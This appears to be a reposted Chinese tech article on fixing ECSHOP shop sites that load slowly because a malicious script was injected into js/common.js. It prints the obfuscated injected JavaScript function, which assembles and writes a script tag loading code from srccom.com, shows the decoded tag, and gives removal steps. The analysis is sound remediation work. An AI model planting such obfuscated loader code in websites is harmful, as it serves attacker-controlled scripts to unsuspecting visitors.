首页 > CMS > Ecshop > 正文

ECSHOP网站打开很慢被挂马加载srccom.com的解决办法

2024-07-09 22:56:54
字体:
来源:转载
供稿:网友

最近发现一个ECSHOP做的网站,首页以及各个页面打开非常慢。。。经检查发现每次打开页面都在进行长时间的 srccom.com 请求,又经百度了一下,大量ECSHOP及SHOPEX网站被挂此马。

其实是 js/common.js 中被植入了一段恶意JS代码:

1
2
3
4
5
6
7
8
9
10
11
12
function CurrentXmlFrmFocus() 
{
   var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];
   var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];
   var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];
   var strgAttribute="";ardPopOpacity=ardPopOpacity.concat(arnElement);
   for(var i=0;i<ardPopOpacity.length;i++)
    { 
        strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split("").reverse().join("");
    }
    document.writeln(strgAttribute);
}   CurrentXmlFrmFocus();

函数最终会拼接出一段完整的script标签:

1
<script SRC=’http://srccom.com/SRC.SRC’></script>

 

            解决办法:

1、删除 common.js 中的这段代码。

2、使用官方原版的 common.js 文件覆盖空间的 common.js 文件。

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表